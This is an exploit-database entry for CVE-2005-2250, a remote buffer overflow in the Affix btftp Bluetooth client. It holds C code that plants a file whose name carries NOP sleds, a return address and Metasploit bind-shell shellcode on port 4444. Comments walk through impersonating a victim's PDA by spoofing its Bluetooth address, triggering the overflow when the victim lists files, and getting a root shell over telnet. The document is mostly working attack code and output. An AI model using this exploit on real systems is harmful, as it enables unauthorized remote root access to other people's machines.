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- Пройдено
- Автор
- KEVIN FINISTERRE
- Тип уязвимости
- REMOTE
- Платформа
- HARDWARE
- CVE
- cve-2005-2250
- Дата публикации
- 2005-07-03
C:
/*
- Tools you will probably need:
- http://www.digitalmunition.com/setbd-affix.c
- KF is one bad mofo /str0ke
Remote Nokia Affix btftp client exploit
by kf_lists[at]secnetops[dot]com
threat:~# btftp
Affix version: Affix 2.1.1
Wellcome to OBEX ftp. Type ? for help.
Mode: Bluetooth
SDP: yes
ftp> open 00:04:3e:65:a1:c8
Connected.
ftp> ls
Z8Á¾ýÞ)á½Tnb 6 uûÿ¿uûÿ¿3ÉéëèÿÿÿÿÀ^vî0^îüâô¨5?Ê24ÿ¶©×?#°ÈÚ¼V6²V
Ϲ¿)ýÞ
ýÞÑýÞÐÉî¼Xq¶X6¶Y0
----------------------
root@frieza:/var/spool/affix/Inbox# telnet 192.168.1.207 4444
Trying 192.168.1.207...
Connected to 192.168.1.207.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root)
: command not found
hostname;
threat
: command not found
*/
#include <stdio.h>
#include <strings.h>
main()
{
FILE *malfile;
/* linux_ia32_bind - LPORT=4444 Size=108 Encoder=Pex http://metasploit.com */
unsigned char scode[] =
"\x33\xc9\x83\xe9\xeb\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x99"
"\xee\x30\x5e\x83\xee\xfc\xe2\xf4\xa8\x35\x63\x1d\xca\x84\x32\x34"
"\xff\xb6\xa9\xd7\x78\x23\xb0\xc8\xda\xbc\x56\x36\x88\xb2\x56\x0d"
"\x10\x0f\x5a\x38\xc1\xbe\x61\x08\x10\x0f\xfd\xde\x29\x88\xe1\xbd"
"\x54\x6e\x62\x0c\xcf\xad\xb9\xbf\x29\x88\xfd\xde\x0a\x84\x32\x07"
"\x29\xd1\xfd\xde\xd0\x97\xc9\xee\x92\xbc\x58\x71\xb6\x9d\x58\x36"
"\xb6\x8c\x59\x30\x10\x0d\x62\x0d\x10\x0f\xfd\xde";
char buf[1024];
memset(buf,'\0',sizeof(buf));
memset(buf,'\x90',94);
strcat(buf+94,"\x75\xfb\xff\xbf");
strcat(buf+98,"\x75\xfb\xff\xbf");
memset(buf+102,'\x90',40);
strcat(buf+142,scode);
if(!(malfile = fopen(buf,"w+"))) {
printf("error opening file\n");
exit(1);
}
fprintf(malfile, "pwned\n" );
fclose(malfile);
}
/*
First lets find someone to impersonate.
root@frieza:~# btctl discovery
Searching 8 sec ...
Searching done. Resolving names ...
done.
+1: Address: 00:0c:76:46:f0:21, Class: 0xB20104, Key: "no", Name: "threat"
Computer (Desktop) [Networking,Object Transfer,Audio,Information]
+2: Address: 00:10:60:29:4f:f1, Class: 0x420210, Key: "no", Name: "Bluetooth Modem"
Phone (Wired Modem/VoiceGW) [Networking,Telephony]
+3: Address: 00:04:3e:65:a1:c8, Class: 0x120110, Key: "no", Name: "Pocket_PC"
Computer (Handheld PC/PDA) [Networking,Object Transfer]
Lets pretend to be some poor chaps PDA.
root@frieza:~# ./setbd-affix 00:04:3e:65:a1:c8
Using BD_ADDR from command line
Setting BDA to 00:04:3e:65:a1:c8
root@frieza:~# btctl
bt0 01:02:03:04:05:06
Flags: UP DISC CONN
RX: acl:159 sco:0 event:97 bytes:4810 errors:0 dropped:0
TX: acl:168 sco:0 cmd:29 bytes:19267 errors:0 dropped:0
Security: service pair [-auth, -encrypt]
Packets: DM1 DH1 DM3 DH3 DM5 DH5 HV1 HV3
Role: deny switch, remain slave
root@frieza:~# btctl reset
root@frieza:~# btctl down
root@frieza:~# btctl up
btctl: cmd_initdev: Unable to start device (bt0)
root@frieza:~# btctl up
root@frieza:~# btctl
bt0 00:04:3e:65:a1:c8
Flags: UP DISC CONN
RX: acl:159 sco:0 event:126 bytes:5796 errors:0 dropped:0
TX: acl:168 sco:0 cmd:52 bytes:19885 errors:0 dropped:0
Security: service pair [-auth, -encrypt]
Packets: DM1 DH1 DM3 DH3 DM5 DH5 HV1 HV3
Role: deny switch, remain slave
root@frieza:~# btctl name "Pocket_PC"
God I love my ROK chip!
Wait for the poor chap to use his affix btftp to connect to his Pocket_PC.
Hopefully his bluetooth stack confuses us for his PDA.
Obviously you need to find out the general area of your shellcode and fix the exploit accordingly.
0xbffffb70: '\220' <repeats 40 times>,
"3É\203éëèÿÿÿÿÀ^\201v\016\231î0^\203îüâô¨5c\035Ê\20424ÿ¶©×x#°ÈÚ¼V6\210²V\r\020\017Z8Á¾a\b\020\017ýÞ)\210á½Tnb\fϹ¿)\210ýÞ\n\2042\a)ÑýÞÐ\227Éî\222¼Xq¶\235X6¶\214Y0\020\rb\r\020\017ýÞ"
root@frieza:/var/spool/affix/Inbox# pico ../btftp-ex.c
root@frieza:/var/spool/affix/Inbox# cc -o ../btftp-ex ../btftp-ex.c
root@frieza:/var/spool/affix/Inbox# ../btftp-ex
Verify that a nice long file name is left behind.
root@frieza:/var/spool/affix/Inbox# ls
??????????????????????????????????????????????????????????????????????????????????????????????u???u???????????????????????????????????????????3??????????^?v???0^??????5c???24????x#????V6??V???Z8??a?????)???Tnb?????)?????2?)?????????Xq??X6??Y0??b?????
Start up the bluetooth services.
root@frieza:/etc/affix# btsrv -C ./btsrv.conf
btsrv: main: btsrv started [Affix 2.1.2].
btsrv: start_service: Bound service Serial Port to port 1
btsrv: start_service: Bound service Dialup Networking to port 2
btsrv: start_service: Bound service Dialup Networking Emulation to port 3
btsrv: start_service: Bound service Fax Service to port 4
btsrv: start_service: Bound service LAN Access to port 5
btsrv: start_service: Bound service OBEX File Transfer to port 6
btsrv: start_service: Bound service OBEX Object Push to port 7
btsrv: start_service: Bound service Headset to port 8
btsrv: start_service: Bound service HeadsetAG to port 9
btsrv: start_service: Bound service HandsFree to port 10
btsrv: start_service: Bound service HandsFreeAG to port 11
Wait for the person to connect to your device and attempt to perform a file listing.
This of course will trigger the overflow and execute your shellcode
threat:~# btftp
Affix version: Affix 2.1.1
Wellcome to OBEX ftp. Type ? for help.
Mode: Bluetooth
SDP: yes
ftp> open 00:04:3e:65:a1:c8
Connected.
ftp> ls
Z8Á¾ýÞ)á½Tnb 6 uûÿ¿uûÿ¿3ÉéëèÿÿÿÿÀ^vî0^îüâô¨5?Ê24ÿ¶©×?#°ÈÚ¼V6²V
Ϲ¿)ýÞ
ýÞÑýÞÐÉî¼Xq¶X6¶Y0
You can tell when they have connected via the following log file entries.
btsrv: handle_input: Connection from 00:02:01:44:ad:99
channel 6 (OBEX File Transfer Profile)
btsrv: execute_cmd: Socket multiplexed to stdin/stdout
btsrv: signal_handler: Sig handler : 2
After they have done so you will use the PAND connection you already hacked to obtain your shell. =]
Or perhaps write some bluetooth aware shellcode.
root@frieza:/var/spool/affix/Inbox# telnet 192.168.1.207 4444
Trying 192.168.1.207...
Connected to 192.168.1.207.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root)
: command not found
hostname;
threat
: command not found
*/
// milw0rm.com [2005-07-03]
- Источник
- www.exploit-db.com